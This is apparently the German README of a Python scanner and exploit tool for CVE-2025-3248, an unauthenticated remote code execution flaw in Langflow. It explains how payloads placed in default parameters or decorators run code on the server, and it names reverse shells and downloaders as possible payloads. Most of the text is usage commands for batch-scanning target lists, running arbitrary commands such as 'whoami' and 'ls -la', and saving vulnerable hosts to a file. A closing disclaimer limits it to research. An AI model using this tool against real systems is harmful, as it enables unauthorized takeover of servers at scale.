
Langflow ruft beim Parsen und Kompilieren des vom Benutzer übermittelten „Verifizierungscodes“ mittels AST-Analyse Python’s `compile()`/`exec()` auf, ohne Authentifizierung oder Sandbox-Einschränkungen (wobei in der Kompilierungsphase auch Funktionsstandardparameter und Dekoratoren ausgewertet werden). Angreifer können bösartige Payloads in Standardparameterwerten oder Dekoratoren platzieren und so beliebige Anweisungen im Serverkontext ausführen (Reverse Shells, Downloader, Lateral Movement usw.).
Ein Python-Tool zum Scannen und Ausnutzen der Schwachstelle CVE-2025-3248, die Remote-Code-Ausführung (RCE) in Langflow-Anwendungen ermöglicht.
pip install requests
python cve-2025-3248.py http://target:port
python cve-2025-3248.py http://target:port -c "id"
python cve-2025-3248.py -f urls.txt
python cve-2025-3248.py -f urls.txt -c "whoami"
python cve-2025-3248.py -f urls.txt -t 20 --timeout 15 -v
url: Ziel-URL (z. B. http://10.10.10.1:7860)-f, --file: Datei mit URL-Liste, eine URL pro Zeile-c, --cmd: Auszuführender Befehl (z. B. id, whoami)--timeout: Request-Timeout, Standard 10 Sekunden-t, --threads: Anzahl der Threads für Batch-Scans, Standard 10-v, --verbose: Ausführlicher Modus, zeigt die Rohantwortenpython cve-2025-3248.py http://192.168.1.100:7860
python cve-2025-3248.py http://192.168.1.100:7860 -c "ls -la"
Datei targets.txt erstellen:
http://192.168.1.100:7860
http://192.168.1.101:7860
http://192.168.1.102:7860
Dann ausführen:
python cve-2025-3248.py -f targets.txt
python cve-2025-3248.py -f targets.txt -c "uname -a" -t 5
[+] Erfolgreiche Ausführung[-] Fehler oder Misserfolg[!] Warnhinweis[*] InformationsausgabeErfolgreich gescannte Ziele werden in vulnerable_targets.txt oder vulnerable_targets_{command}.txt gespeichert.
Dieses Tool dient ausschließlich Sicherheitsforschung und Bildungszwecken. Der Nutzer ist für sein Handeln verantwortlich. Das Testen von Systemen ohne Autorisierung kann gegen Gesetze verstoßen.